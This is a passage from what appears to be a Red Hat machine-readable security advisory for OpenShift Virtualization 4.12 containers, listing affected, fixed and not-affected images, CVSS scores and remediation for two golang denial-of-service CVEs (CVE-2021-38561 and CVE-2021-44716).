"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2100495", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", title: "Vulnerability description", }, { category: "summary", text: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", title: "Vulnerability summary", }, { category: "other", text: "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang's library. The overall DoS attack vector depends directly on how the library's input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-38561", }, { category: "external", summary: "RHBZ#2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-38561", url: "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2021-0113", url: "https://pkg.go.dev/vuln/GO-2021-0113", }, ], release_date: "2021-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", }, { cve: "CVE-2021-44716", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030801", }, ], notes: [ { category: "description", text: "There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: limit growth of header canonicalization cache", title: "Vulnerability summary", }, { category: "other", text: "For OpenShift Container Platform, OpenShift 